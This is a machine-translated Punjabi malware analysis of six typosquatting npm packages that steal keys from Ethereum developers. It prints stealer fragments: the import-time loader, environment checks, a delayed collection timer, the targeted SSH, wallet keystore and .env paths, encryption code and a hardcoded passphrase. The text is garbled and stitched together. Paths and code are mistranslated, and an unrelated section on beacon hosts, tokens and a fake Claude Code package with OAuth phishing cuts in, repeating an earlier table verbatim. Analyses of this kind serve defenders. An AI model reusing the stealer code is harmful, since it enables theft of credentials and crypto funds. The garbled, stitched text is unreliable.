EVMDeFi npm ਟਾਈਪੋਸਕੈਟਿੰਗ ਅਟੈਕ ਡਿਵੈਲਪਰ ਕੁੰਜੀਆਂ ਚੋਰੀ ਕਰਦਾ ਹੈ

EVM/DeFi npm ਟਾਈਪੋਸਕੈਟਿੰਗ ਅਟੈਕ ਡਿਵੈਲਪਰ ਕੁੰਜੀਆਂ ਚੋਰੀ ਕਰਦਾ ਹੈ

ਵਿਸ਼ਾ - ਸੂਚੀ

ਪੜ੍ਹਨਯੋਗ ਪੋਸਟਾਂ

ਦਿਲਚਸਪੀ ਵਾਲੀਆਂ ਨਵੀਨਤਮ ਪੋਸਟਾਂ

TL; ਡਾ

6 ਮਈ, 2026 ਨੂੰ, ਇੱਕ ਸਿੰਗਲ ਐਨਪੀਐਮ ਪ੍ਰਕਾਸ਼ਕ, namikazesarada010206, ਨੇ ਈਥਰਿਅਮ, ਸੋਲਿਡਿਟੀ, ਅਤੇ ਡੀਫਾਈ ਡਿਵੈਲਪਰ ਈਕੋਸਿਸਟਮ ਨੂੰ ਨਿਸ਼ਾਨਾ ਬਣਾਉਂਦੇ ਹੋਏ ਛੇ ਖਤਰਨਾਕ ਪੈਕੇਜਾਂ ਨੂੰ ਅੱਗੇ ਵਧਾਇਆ।

ਪੈਕੇਜ, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utilsਹੈ, ਅਤੇ web3-utils-core, ਪ੍ਰਸਿੱਧ Web3 ਟੂਲਿੰਗ ਲਈ ਸਹਾਇਕ ਲਾਇਬ੍ਰੇਰੀਆਂ ਵਰਗੇ ਦਿਖਣ ਲਈ ਤਿਆਰ ਕੀਤੇ ਗਏ ਸੰਭਾਵੀ ਨਾਮਾਂ ਦੀ ਵਰਤੋਂ ਕੀਤੀ।

ਸਾਰੇ ਛੇ ਪੈਕੇਜਾਂ ਵਿੱਚ ਇੱਕੋ ਜਿਹਾ ਸੀ telemetry.js ਫਾਈਲ। ਫਾਈਲ ਕਲੱਸਟਰ ਵਿੱਚ ਬਾਈਟ-ਇੱਕੋ ਜਿਹੀ ਸੀ, SHA-256 ਦੇ ਨਾਲ:

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

ਮਾਲਵੇਅਰ ਇੰਸਟਾਲ ਸਮੇਂ ਤੇ ਨਹੀਂ ਚੱਲਦਾ। ਕੋਈ ਨਹੀਂ ਹੈ preinstall or postinstall ਹੁੱਕ। ਇਸਦੀ ਬਜਾਏ, ਇਹ ਉਦੋਂ ਕਿਰਿਆਸ਼ੀਲ ਹੁੰਦਾ ਹੈ ਜਦੋਂ ਪੈਕੇਜ ਨੂੰ ਆਯਾਤ ਕੀਤਾ ਜਾਂਦਾ ਹੈ require().

ਉਹ ਵੇਰਵਾ ਮਾਇਨੇ ਰੱਖਦਾ ਹੈ।

ਇਮਪਲਾਂਟ ਉਦੋਂ ਤੱਕ ਉਡੀਕ ਕਰਦਾ ਹੈ ਜਦੋਂ ਤੱਕ ਕੋਈ ਡਿਵੈਲਪਰ ਅਸਲ ਵਿੱਚ ਪੈਕੇਜ ਦੀ ਵਰਤੋਂ ਨਹੀਂ ਕਰਦਾ। ਫਿਰ ਇਹ ਜਾਂਚ ਕਰਦਾ ਹੈ ਕਿ ਕੀ ਵਰਕਸਟੇਸ਼ਨ ਇੱਕ ਅਸਲੀ ਈਥਰਿਅਮ / ਸੋਲਿਡਿਟੀ ਵਿਕਾਸ ਵਾਤਾਵਰਣ ਵਰਗਾ ਦਿਖਾਈ ਦਿੰਦਾ ਹੈ। ਇਹ ਅਲਕੀਮੀ ਜਾਂ ਇਨਫੂਰਾ ਕੁੰਜੀਆਂ, ਪ੍ਰਾਈਵੇਟ ਕੁੰਜੀਆਂ, ਮੈਮੋਨਿਕਸ, ਡਿਪਲਾਇਰ ਕੁੰਜੀਆਂ, ਜਾਂ ਇੱਕ ਸਥਾਨਕ ਫਾਊਂਡਰੀ ਡਾਇਰੈਕਟਰੀ ਦੀ ਖੋਜ ਕਰਦਾ ਹੈ।

ਜੇਕਰ ਹੋਸਟ ਮੇਲ ਖਾਂਦਾ ਹੈ, ਤਾਂ ਚੋਰੀ ਕਰਨ ਵਾਲਾ SSH ਪ੍ਰਾਈਵੇਟ ਕੁੰਜੀਆਂ, ਫਾਊਂਡਰੀ / ਗੇਥ / ਬ੍ਰਾਊਨੀ ਵਾਲਿਟ ਕੀਸਟੋਰ ਇਕੱਠੇ ਕਰਦਾ ਹੈ, .env* ਫਾਈਲਾਂ, ਅਤੇ ਸੰਵੇਦਨਸ਼ੀਲ ਵਾਤਾਵਰਣ ਵੇਰੀਏਬਲ। ਇਹ ਇੱਕ ਹਾਰਡਕੋਡ ਕੀਤੇ ਪਾਸਫਰੇਜ ਦੀ ਵਰਤੋਂ ਕਰਕੇ AES-256-GCM ਨਾਲ ਬੰਡਲ ਨੂੰ ਏਨਕ੍ਰਿਪਟ ਕਰਦਾ ਹੈ ਅਤੇ ਇਸਨੂੰ TLS ਤਸਦੀਕ ਅਯੋਗ ਕਰਕੇ ਇੱਕ ਕੱਚੇ IPv4 C2 ਐਂਡਪੁਆਇੰਟ ਵਿੱਚ ਐਕਸਫਿਲਟਰ ਕਰਦਾ ਹੈ।

Xygeni ਦੇ ਮਾਲਵੇਅਰ ਅਰਲੀ ਵਾਰਨਿੰਗ (MEW) ਸਿਸਟਮ ਨੇ ਸਾਰੇ ਛੇ ਪੈਕੇਜਾਂ ਨੂੰ ਖਤਰਨਾਕ ਵਜੋਂ ਪੁਸ਼ਟੀ ਕੀਤੀ। npm ਰਜਿਸਟਰੀ ਟੇਕਡਾਉਨ ਰਿਪੋਰਟ ਬੰਡਲ ਲੰਬਿਤ ਹੈ।

ਕਲੱਸਟਰ: ਛੇ ਪੈਕੇਜ, ਇੱਕ ਪ੍ਰਕਾਸ਼ਕ

ਪ੍ਰਕਾਸ਼ਕ ਖਾਤਾ namikazesarada010206 ਗੈਰ-ਪ੍ਰਮਾਣਿਤ Gmail ਪਤੇ ਨਾਲ ਲਿੰਕ ਕੀਤਾ ਗਿਆ ਸੀ namikazesarada010206@gmail.com.

ਇਹ ਮੁਹਿੰਮ 6 ਮਈ, 2026 ਨੂੰ ਇੱਕ ਦਿਨ ਦੇ ਪ੍ਰਕਾਸ਼ਨ ਦੇ ਰੂਪ ਵਿੱਚ ਪ੍ਰਗਟ ਹੋਈ। ਸਾਰੇ ਛੇ ਪੈਕੇਜਾਂ ਨੂੰ ਇਸ ਤਰ੍ਹਾਂ ਵਰਜਨ ਕੀਤਾ ਗਿਆ ਸੀ 1.0.0, ਕੋਲ ਜ਼ੀਰੋ ਰਨਟਾਈਮ ਨਿਰਭਰਤਾ ਸੀ, ਅਤੇ ਸਿਰਫ਼ ਤਿੰਨ ਫਾਈਲਾਂ ਭੇਜੀਆਂ ਗਈਆਂ ਸਨ:

package.json index.js telemetry.js

ਉਹਨਾਂ ਨੇ ਉਹੀ ਸਰੋਤ ਰਿਪੋਜ਼ਟਰੀ ਵੀ ਘੋਸ਼ਿਤ ਕੀਤੀ:

https://github.com/harunosakura030303-maker/evmchain-config

ਪਹਿਲੇ ਤਿੰਨ ਪੈਕੇਜ ਪਹਿਲੇ ਪ੍ਰਕਾਸ਼ਨ 'ਤੇ MEW ਸਕੈਨਰਾਂ ਦੁਆਰਾ ਫੜੇ ਗਏ ਸਨ। ਬਾਕੀ ਤਿੰਨਾਂ ਨੂੰ ਪ੍ਰਕਾਸ਼ਕ ਦੇ npm ਪ੍ਰੋਫਾਈਲ ਦੀ ਵਿਸ਼ਲੇਸ਼ਕ ਸਮੀਖਿਆ ਤੋਂ ਬਾਅਦ ਜ਼ਬਰਦਸਤੀ ਫਲੈਗ ਕੀਤਾ ਗਿਆ ਸੀ। ਇੱਕ ਵਾਰ ਉਹੀ ਬਾਈਟ-ਸਮਾਨ telemetry.js ਕਲੱਸਟਰ ਵਿੱਚ ਪੁਸ਼ਟੀ ਕੀਤੀ ਗਈ ਸੀ, ਉਹਨਾਂ ਨੂੰ ਇਕਸਾਰਤਾ ਦੁਆਰਾ ਖਤਰਨਾਕ ਵਜੋਂ ਬੰਦ ਕਰ ਦਿੱਤਾ ਗਿਆ ਸੀ।

ਪੈਕੇਜ ਵਰਜਨ npm ਪ੍ਰਕਾਸ਼ਿਤ MEW ਟਿਕਟ ਫੈਸਲੇ
ਵੀਮ-ਕੋਰ 1.0.0 2026-05-06 01:38:44Z #51049 ਖਰਾਬ
viem-utils-core 1.0.0 2026-05-06 #51050 ਖਰਾਬ
ਹਾਰਡਹੈਟ-ਕੋਰ-ਯੂਟਿਲਸ 1.0.0 2026-05-06 #51051 ਖਰਾਬ
ਈਵੀਐਮ-ਯੂਟਿਲਸ 1.0.0 2026-05-06 #51069 ਖ਼ਰਾਬ, ਇਕਸਾਰਤਾ ਦੁਆਰਾ
ਫਾਊਂਡਰੀ-ਯੂਟਿਲਸ 1.0.0 2026-05-06 #51071 ਖ਼ਰਾਬ, ਇਕਸਾਰਤਾ ਦੁਆਰਾ
web3-utils-core 1.0.0 2026-05-06 #51070 ਖ਼ਰਾਬ, ਇਕਸਾਰਤਾ ਦੁਆਰਾ

ਨਾਮਕਰਨ ਦੀ ਰਣਨੀਤੀ ਸਿੱਧੀ ਪਰ ਪ੍ਰਭਾਵਸ਼ਾਲੀ ਹੈ।

ਇਹ ਪੈਕੇਜ ਬਿਲਕੁਲ ਅੱਪਸਟ੍ਰੀਮ ਨਾਵਾਂ ਦੀ ਨਕਲ ਨਹੀਂ ਕਰਦੇ। ਇਸ ਦੀ ਬਜਾਏ, ਉਹ ਮੰਨਣਯੋਗ "ਉਪਯੋਗਤਾ" ਪਿਛੇਤਰਾਂ ਦੀ ਵਰਤੋਂ ਕਰਦੇ ਹਨ ਜਿਵੇਂ ਕਿ -core, -utilsਹੈ, ਅਤੇ -utils-core. ਇਸ ਨਾਲ ਉਹ ਸਾਥੀ ਲਾਇਬ੍ਰੇਰੀਆਂ ਵਾਂਗ ਦਿਖਾਈ ਦਿੰਦੇ ਹਨ ਜਿਨ੍ਹਾਂ ਨੂੰ ਇੱਕ ਡਿਵੈਲਪਰ Web3 ਟੂਲਿੰਗ ਦੇ ਨੇੜੇ ਦੇਖਣ ਦੀ ਉਮੀਦ ਕਰ ਸਕਦਾ ਹੈ।

ਖ਼ਰਾਬ ਪੈਕੇਜ ਜਾਇਜ਼ ਟੀਚਾ
ਵੀਮ-ਕੋਰ viem, ਇੱਕ ਪ੍ਰਸਿੱਧ Ethereum TypeScript ਕਲਾਇੰਟ
viem-utils-core ਵੀਏਮ
ਹਾਰਡਹੈਟ-ਕੋਰ-ਯੂਟਿਲਸ ਹਾਰਡਹੈਟ, ਇੱਕ ਮੁੱਖ ਧਾਰਾ ਸਾਲਿਡਿਟੀ ਵਿਕਾਸ ਵਾਤਾਵਰਣ
ਈਵੀਐਮ-ਯੂਟਿਲਸ ਆਮ EVM ਟੂਲਿੰਗ ਨੇਮਸਪੇਸ
ਫਾਊਂਡਰੀ-ਯੂਟਿਲਸ ਫਾਊਂਡਰੀ, ਇੱਕ ਸਾਲਿਡਿਟੀ ਟੂਲਚੇਨ
web3-utils-core web3-utils, Web3.js ਸਹਾਇਕ

ਇਹ "ਪੂਰਕ ਪੈਕੇਜ" ਪੈਟਰਨ ਹੈ: "ਮੈਂ ਅਸਲ ਪੈਕੇਜ ਹਾਂ" ਨਹੀਂ, ਸਗੋਂ "ਮੈਂ ਅਸਲ ਪੈਕੇਜ ਦੇ ਆਲੇ-ਦੁਆਲੇ ਇੱਕ ਵਾਜਬ ਸਹਾਇਕ ਵਾਂਗ ਦਿਖਦਾ ਹਾਂ।"

DeFi ਡਿਵੈਲਪਰਾਂ ਲਈ ਤੇਜ਼ੀ ਨਾਲ ਅੱਗੇ ਵਧਣਾ, ਇਹ ਜੋਖਮ ਪੈਦਾ ਕਰਨ ਲਈ ਕਾਫ਼ੀ ਹੈ।

ਜਦੋਂ ਪੈਕੇਜ ਆਯਾਤ ਕੀਤਾ ਜਾਂਦਾ ਹੈ ਤਾਂ ਕੀ ਹੁੰਦਾ ਹੈ

ਹਮਲੇ ਦੀ ਲੜੀ ਛੋਟੀ, ਜਾਣਬੁੱਝ ਕੇ ਬਣਾਈ ਗਈ ਹੈ, ਅਤੇ ਕ੍ਰਿਪਟੋ-ਵਿਕਾਸ ਵਾਤਾਵਰਣਾਂ 'ਤੇ ਕੇਂਦ੍ਰਿਤ ਹੈ।

ਕੋਈ ਇੰਸਟਾਲੇਸ਼ਨ ਹੁੱਕ ਨਹੀਂ ਹੈ। ਇਸਦੀ ਬਜਾਏ, ਹਰੇਕ ਪੈਕੇਜ ਵਿੱਚ ਇੱਕ ਸ਼ਾਮਲ ਹੁੰਦਾ ਹੈ index.js ਜੋ ਸਟੱਬ ਫੰਕਸ਼ਨੈਲਿਟੀ ਨੂੰ ਐਕਸਪੋਰਟ ਕਰਦਾ ਹੈ ਅਤੇ ਫਿਰ ਖਤਰਨਾਕ ਟੈਲੀਮੈਟਰੀ ਮੋਡੀਊਲ ਨੂੰ ਲੋਡ ਕਰਦਾ ਹੈ।

require('./telemetry').init();

ਇਸਦਾ ਮਤਲਬ ਹੈ ਕਿ ਮਾਲਵੇਅਰ ਪਹਿਲੀ ਵਾਰ ਆਯਾਤ ਕਰਨ 'ਤੇ ਸਰਗਰਮ ਹੋ ਜਾਂਦਾ ਹੈ।

ਇਹ ਹਮਲਾਵਰ ਲਈ ਕਾਰਜਸ਼ੀਲ ਤੌਰ 'ਤੇ ਲਾਭਦਾਇਕ ਹੈ। ਬਹੁਤ ਸਾਰੇ ਸਕੈਨਰ ਅਤੇ ਸੈਂਡਬੌਕਸ ਇੰਸਟਾਲ-ਟਾਈਮ ਵਿਵਹਾਰ 'ਤੇ ਕੇਂਦ੍ਰਤ ਕਰਦੇ ਹਨ। ਇਹ ਪੈਕੇਜ ਉਦੋਂ ਤੱਕ ਉਡੀਕ ਕਰਦਾ ਹੈ ਜਦੋਂ ਤੱਕ ਇਹ ਅਸਲ ਵਿੱਚ ਇੱਕ ਡਿਵੈਲਪਰ, ਬਿਲਡ ਸਕ੍ਰਿਪਟ, ਟੈਸਟ ਸੂਟ, ਜਾਂ ਰਨਟਾਈਮ ਮਾਰਗ ਦੁਆਰਾ ਨਹੀਂ ਵਰਤਿਆ ਜਾਂਦਾ।

ਐਕਟੀਵੇਸ਼ਨ ਗੇਟ: ਸਿਰਫ਼ ਅਸਲੀ ਵੈੱਬ3 ਡਿਵੈਲਪਰ ਵਰਕਸਟੇਸ਼ਨਾਂ 'ਤੇ ਹੀ ਫਾਇਰ

ਇਮਪਲਾਂਟ ਦਾ ਸਭ ਤੋਂ ਮਹੱਤਵਪੂਰਨ ਹਿੱਸਾ ਐਕਟੀਵੇਸ਼ਨ ਗੇਟ ਹੈ।

ਮਾਲਵੇਅਰ ਆਮ ਤੌਰ 'ਤੇ ਈਥਰਿਅਮ / ਸੋਲਿਡਿਟੀ ਡਿਵੈਲਪਰ ਮਸ਼ੀਨਾਂ 'ਤੇ ਪਾਏ ਜਾਣ ਵਾਲੇ ਵਾਤਾਵਰਣ ਵੇਰੀਏਬਲਾਂ ਦੀ ਜਾਂਚ ਕਰਦਾ ਹੈ:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

ਇਹ ਇਹ ਵੀ ਜਾਂਚ ਕਰਦਾ ਹੈ ਕਿ ਕੀ ਫਾਊਂਡਰੀ ਸਥਾਪਤ ਦਿਖਾਈ ਦਿੰਦੀ ਹੈ:

fs.existsSync(path.join(os.homedir(), '.foundry'))

ਜੇਕਰ ਕੋਈ ਵੀ ਸ਼ਰਤ ਸੱਚ ਨਹੀਂ ਹੈ, ਤਾਂ ਫੰਕਸ਼ਨ ਵਾਪਸ ਆਉਂਦਾ ਹੈ ਅਤੇ ਕੁਝ ਨਹੀਂ ਕਰਦਾ।

ਇਹ ਆਮ ਵਿਸ਼ਲੇਸ਼ਣ ਵਾਤਾਵਰਣਾਂ ਵਿੱਚ ਪੈਕੇਜ ਨੂੰ ਸ਼ਾਂਤ ਬਣਾਉਂਦਾ ਹੈ। ਫਾਊਂਡਰੀ, ਅਲਕੀਮੀ ਕੁੰਜੀਆਂ, ਇਨਫੂਰਾ ਕੁੰਜੀਆਂ, ਪ੍ਰਾਈਵੇਟ ਕੁੰਜੀਆਂ, ਜਾਂ ਨੀਮੋਨਿਕਸ ਤੋਂ ਬਿਨਾਂ ਇੱਕ ਸੈਂਡਬੌਕਸ ਇੱਕ ਨੁਕਸਾਨ ਰਹਿਤ ਦਿੱਖ ਵਾਲਾ ਆਯਾਤ ਦੇਖ ਸਕਦਾ ਹੈ।

ਇੱਕ ਮੇਲ ਖਾਂਦੇ ਹੋਸਟ 'ਤੇ, ਮਾਲਵੇਅਰ ਸੰਗ੍ਰਹਿ ਤੋਂ ਪਹਿਲਾਂ 60 ਤੋਂ 90 ਸਕਿੰਟ ਉਡੀਕ ਕਰਦਾ ਹੈ:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

ਦੇਰੀ ਆਯਾਤ ਅਤੇ ਐਕਸਫਿਲਟਰੇਸ਼ਨ ਵਿਚਕਾਰ ਸਪੱਸ਼ਟ ਸਬੰਧ ਨੂੰ ਘਟਾਉਂਦੀ ਹੈ। .unref() ਜੇਕਰ ਪੈਕੇਜ ਨੂੰ ਥੋੜ੍ਹੇ ਸਮੇਂ ਲਈ ਸਕ੍ਰਿਪਟ ਵਿੱਚ ਆਯਾਤ ਕੀਤਾ ਗਿਆ ਸੀ ਤਾਂ ਕਾਲ ਹੋਸਟ ਪ੍ਰਕਿਰਿਆ ਨੂੰ ਆਮ ਤੌਰ 'ਤੇ ਬਾਹਰ ਜਾਣ ਦਿੰਦਾ ਹੈ।

ਇਹ ਸ਼ੋਰ-ਸ਼ਰਾਬੇ ਵਾਲਾ ਭੰਨ-ਤੋੜ ਕਰਨ ਵਾਲਾ ਵਿਵਹਾਰ ਨਹੀਂ ਹੈ। ਇਹ ਇੱਕ ਨਿਸ਼ਾਨਾ ਬਣਾਇਆ ਗਿਆ ਚੋਰੀ ਕਰਨ ਵਾਲਾ ਵਿਵਹਾਰ ਹੈ ਜੋ ਦੌੜਨ ਤੋਂ ਬਚਣ ਲਈ ਤਿਆਰ ਕੀਤਾ ਗਿਆ ਹੈ ਜਦੋਂ ਤੱਕ ਕਿ ਡਿਵੈਲਪਰ ਵਾਤਾਵਰਣ ਚੋਰੀ ਕਰਨ ਦੇ ਯੋਗ ਨਾ ਹੋਵੇ।

ਚੋਰ ਕੀ ਇਕੱਠਾ ਕਰਦਾ ਹੈ

ਇੱਕ ਵਾਰ ਐਕਟੀਵੇਸ਼ਨ ਗੇਟ ਪਾਸ ਹੋਣ ਤੋਂ ਬਾਅਦ, ਮਾਲਵੇਅਰ ਉਹਨਾਂ ਸਰੋਤਾਂ ਤੋਂ ਇਕੱਠਾ ਕਰਦਾ ਹੈ ਜੋ Web3 ਵਿਕਾਸ ਵਿੱਚ ਸਭ ਤੋਂ ਮਹੱਤਵਪੂਰਨ ਹਨ: ਪ੍ਰਾਈਵੇਟ ਕੁੰਜੀਆਂ, ਵਾਲਿਟ ਕੀਸਟੋਰ, ਡਿਪਲਾਇਮੈਂਟ ਕ੍ਰੈਡੈਂਸ਼ੀਅਲ, ਕਲਾਉਡ ਸੀਕਰੇਟ, npm ਟੋਕਨ, ਅਤੇ ਸਥਾਨਕ ਪ੍ਰੋਜੈਕਟ ਕੌਂਫਿਗਰੇਸ਼ਨ।

ਸਰੋਤ ਕੀ ਇਕੱਠਾ ਕੀਤਾ ਜਾਂਦਾ ਹੈ
ਪ੍ਰੋਸੈਸ.ਐਨਵੀ ਕੋਈ ਵੀ ਵੇਰੀਏਬਲ ਮੇਲ ਖਾਂਦਾ /ਟੋਕਨ|ਸੀਕ੍ਰੇਟ|ਕੀ|ਪਾਸ|ਪ੍ਰਮਾਣਿਕਤਾ|ਪ੍ਰਾਈਵੇਟ|ਬੀਜ|ਮੈਮੋਨਿਕ|AWS|NPM|ਡਿਪਲੋਏ/i
~/.ssh/* ਪੂਰੀ ਫਾਈਲ ਸਮੱਗਰੀ ਸਮੇਤ, PRIVATE KEY ਜਾਂ BEGIN OPENSSH ਵਾਲੀਆਂ ਫਾਈਲਾਂ
~/.ਫਾਊਂਡਰੀ/ਕੀਸਟੋਰ/* ਫਾਊਂਡਰੀ ਵਾਲਿਟ ਕੀਸਟੋਰ ਫਾਈਲਾਂ
~/.ਈਥਰਿਅਮ/ਕੀਸਟੋਰ/* ਗੇਥ ਵਾਲਿਟ ਕੀਸਟੋਰ ਫਾਈਲਾਂ
~/.ਬ੍ਰਾਊਨੀ/ਖਾਤੇ/* ਬ੍ਰਾਊਨੀ ਵਾਲਿਟ ਕੀਸਟੋਰ ਫਾਈਲਾਂ
${cwd}/.env ਪੂਰੀ ਫਾਈਲ ਸਮੱਗਰੀ
${cwd}/.env.local ਪੂਰੀ ਫਾਈਲ ਸਮੱਗਰੀ
${cwd}/.env.ਪ੍ਰੋਡਕਸ਼ਨ ਪੂਰੀ ਫਾਈਲ ਸਮੱਗਰੀ
${cwd}/.env.ਵਿਕਾਸ ਪੂਰੀ ਫਾਈਲ ਸਮੱਗਰੀ
ਓਐਸ.ਹੋਸਟਨੇਮ() ਹੋਸਟ ਮੈਟਾਡੇਟਾ
ਕ੍ਰਿਪਟੋ.ਰੈਂਡਮUUID() ਪੀੜਤ/ਸੈਸ਼ਨ ਪਛਾਣਕਰਤਾ
ਤਾਰੀਖ.ਹੁਣ() ਸੰਗ੍ਰਹਿ ਟਾਈਮਸਟੈਂਪ
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

ATTA ਟੋਕਨ ਹਨ:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

ਅਸੀਂ ਇਸ ਗੱਲ ਦੀ ਪੁਸ਼ਟੀ ਨਹੀਂ ਕਰ ਸਕੇ ਹਾਂ ਕਿ ਟੈਲੀਮੈਟਰੀ ਆਪਰੇਟਰ ਦਾ ਆਪਣਾ ਵਿਸ਼ਲੇਸ਼ਣ ਸੀ ਜਾਂ ਇੱਕ ਵੱਖਰੇ ਤੌਰ 'ਤੇ ਮੁਦਰੀਕਰਨ ਕੀਤਾ ਚੈਨਲ ਸੀ। ਸਾਡੇ ਦੁਆਰਾ ਜਾਂਚੇ ਗਏ ਦੋਵਾਂ ਨਮੂਨਿਆਂ ਵਿੱਚ ATTA ਟੋਕਨ ਇੱਕੋ ਜਿਹੇ ਹਨ।

ਕਲੱਸਟਰ ਬੀ: ਹੀਬਾਈ

claude.hk OAuth ਫਿਸ਼ਿੰਗ + ANTHROPIC_BASE_URL ਹਾਈਜੈਕ

1 ਅਪ੍ਰੈਲ ਦਾ ਨਮੂਨਾ ਮੁਹਿੰਮ ਦਾ ਸਭ ਤੋਂ ਪੁਰਾਣਾ ਹਿੱਸਾ ਹੈ।

heibai:2.1.88-claude.hk-4 ਦੁਆਰਾ ਪ੍ਰਕਾਸ਼ਤ ਕੀਤਾ ਗਿਆ ਸੀ wuguoqiangvip28, ਇੱਕ ਖਾਤਾ 7 ਜੂਨ, 2025 ਨੂੰ ਬਣਾਇਆ ਗਿਆ ਸੀ। ਪੈਕੇਜ ਨੇ ਸਪੱਸ਼ਟ ਤੌਰ 'ਤੇ ਆਪਣੇ ਆਪ ਨੂੰ ਜਾਇਜ਼ ਦੇ ਵਿਰੁੱਧ ਰੂਪ ਦਿੱਤਾ 2.1.88 ਐਂਥ੍ਰੋਪਿਕ ਰੀਲੀਜ਼।

ਇਹ CA-ਸਰਟੀਫਿਕੇਟ MITM ਨਾਲ ਪਰੇਸ਼ਾਨ ਨਹੀਂ ਹੁੰਦਾ। ਇਸ ਦੀ ਬਜਾਏ, ਇਹ OAuth ਐਂਡਪੁਆਇੰਟ ਬਾਰੇ ਉਪਭੋਗਤਾ ਨੂੰ ਝੂਠ ਬੋਲਦਾ ਹੈ।

ਲੀਕ ਹੋਏ ਕਲਾਉਡ ਕੋਡ ਸਰੋਤ ਦੇ ਉੱਪਰ ਖਤਰਨਾਕ ਜੋੜਾਂ ਵਿੱਚ ਸ਼ਾਮਲ ਹਨ:

ਸਰੋਤ ਕੀ ਇਕੱਠਾ ਕੀਤਾ ਜਾਂਦਾ ਹੈ
ਪ੍ਰੋਸੈਸ.ਐਨਵੀ ਕੋਈ ਵੀ ਵੇਰੀਏਬਲ ਮੇਲ ਖਾਂਦਾ /ਟੋਕਨ|ਸੀਕ੍ਰੇਟ|ਕੀ|ਪਾਸ|ਪ੍ਰਮਾਣਿਕਤਾ|ਪ੍ਰਾਈਵੇਟ|ਬੀਜ|ਮੈਮੋਨਿਕ|AWS|NPM|ਡਿਪਲੋਏ/i
~/.ssh/* ਪੂਰੀ ਫਾਈਲ ਸਮੱਗਰੀ ਸਮੇਤ, PRIVATE KEY ਜਾਂ BEGIN OPENSSH ਵਾਲੀਆਂ ਫਾਈਲਾਂ
~/.ਫਾਊਂਡਰੀ/ਕੀਸਟੋਰ/* ਫਾਊਂਡਰੀ ਵਾਲਿਟ ਕੀਸਟੋਰ ਫਾਈਲਾਂ
~/.ਈਥਰਿਅਮ/ਕੀਸਟੋਰ/* ਗੇਥ ਵਾਲਿਟ ਕੀਸਟੋਰ ਫਾਈਲਾਂ
~/.ਬ੍ਰਾਊਨੀ/ਖਾਤੇ/* ਬ੍ਰਾਊਨੀ ਵਾਲਿਟ ਕੀਸਟੋਰ ਫਾਈਲਾਂ
${cwd}/.env ਪੂਰੀ ਫਾਈਲ ਸਮੱਗਰੀ
${cwd}/.env.local ਪੂਰੀ ਫਾਈਲ ਸਮੱਗਰੀ
${cwd}/.env.ਪ੍ਰੋਡਕਸ਼ਨ ਪੂਰੀ ਫਾਈਲ ਸਮੱਗਰੀ
${cwd}/.env.ਵਿਕਾਸ ਪੂਰੀ ਫਾਈਲ ਸਮੱਗਰੀ
ਓਐਸ.ਹੋਸਟਨੇਮ() ਹੋਸਟ ਮੈਟਾਡੇਟਾ
ਕ੍ਰਿਪਟੋ.ਰੈਂਡਮUUID() ਪੀੜਤ/ਸੈਸ਼ਨ ਪਛਾਣਕਰਤਾ
ਤਾਰੀਖ.ਹੁਣ() ਸੰਗ੍ਰਹਿ ਟਾਈਮਸਟੈਂਪ

ਟਾਰਗੇਟ ਸੂਚੀ ਬਹੁਤ ਖਾਸ ਹੈ। ਇਹ ਆਮ ਬ੍ਰਾਊਜ਼ਰ ਚੋਰੀ ਜਾਂ ਵਿਆਪਕ ਪ੍ਰਮਾਣ ਪੱਤਰ ਸਕ੍ਰੈਪਿੰਗ ਨਹੀਂ ਹੈ। ਇਹ ਉਹਨਾਂ ਡਿਵੈਲਪਰਾਂ ਲਈ ਹੈ ਜੋ ਈਥਰਿਅਮ ਐਪਲੀਕੇਸ਼ਨਾਂ ਬਣਾਉਂਦੇ, ਟੈਸਟ ਕਰਦੇ, ਤੈਨਾਤ ਕਰਦੇ ਜਾਂ ਚਲਾਉਂਦੇ ਹਨ।

ਫਾਊਂਡਰੀ, ਗੇਥ, ਅਤੇ ਬ੍ਰਾਊਨੀ ਕੀਸਟੋਰਾਂ ਨੂੰ ਸ਼ਾਮਲ ਕਰਨਾ ਖਾਸ ਤੌਰ 'ਤੇ ਮਹੱਤਵਪੂਰਨ ਹੈ। ਇਹ ਫਾਈਲਾਂ ਵਾਲਿਟ ਜਾਂ ਡਿਪਲਾਇਮੈਂਟ ਪਛਾਣਾਂ ਤੱਕ ਸਿੱਧੀ ਪਹੁੰਚ ਨੂੰ ਦਰਸਾਉਂਦੀਆਂ ਹਨ। ਜੇਕਰ ਹਮਲਾਵਰ ਉਹਨਾਂ ਨੂੰ ਪਾਸਵਰਡ, ਯਾਦਦਾਸ਼ਤ, ਜਾਂ ਵਾਤਾਵਰਣ ਦੇ ਰਾਜ਼ਾਂ ਨਾਲ ਜੋੜ ਸਕਦਾ ਹੈ, ਤਾਂ ਉਹ ਫੰਡਾਂ ਨੂੰ ਟ੍ਰਾਂਸਫਰ ਕਰਨ, ਡਿਪਲਾਇਅਰਾਂ ਦੀ ਨਕਲ ਕਰਨ, ਜਾਂ ਸਮਾਰਟ ਕੰਟਰੈਕਟ ਓਪਰੇਸ਼ਨਾਂ ਨਾਲ ਸਮਝੌਤਾ ਕਰਨ ਦੇ ਯੋਗ ਹੋ ਸਕਦੇ ਹਨ।

ਐਕਸਫਿਲਟਰੇਸ਼ਨ ਤੋਂ ਪਹਿਲਾਂ ਇਨਕ੍ਰਿਪਸ਼ਨ

ਇਹ ਮਾਲਵੇਅਰ ਇਕੱਤਰ ਕੀਤੇ ਡੇਟਾ ਨੂੰ ਭੇਜਣ ਤੋਂ ਪਹਿਲਾਂ ਇਸਨੂੰ ਐਨਕ੍ਰਿਪਟ ਕਰਦਾ ਹੈ।

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

ਹਾਰਡਕੋਡ ਕੀਤਾ ਪਾਸਫ੍ਰੇਜ਼ ਇਹ ਹੈ:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

ਅੰਤਿਮ ਪੇਲੋਡ JSON ਦੇ ਰੂਪ ਵਿੱਚ ਲਪੇਟਿਆ ਹੋਇਆ ਹੈ:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

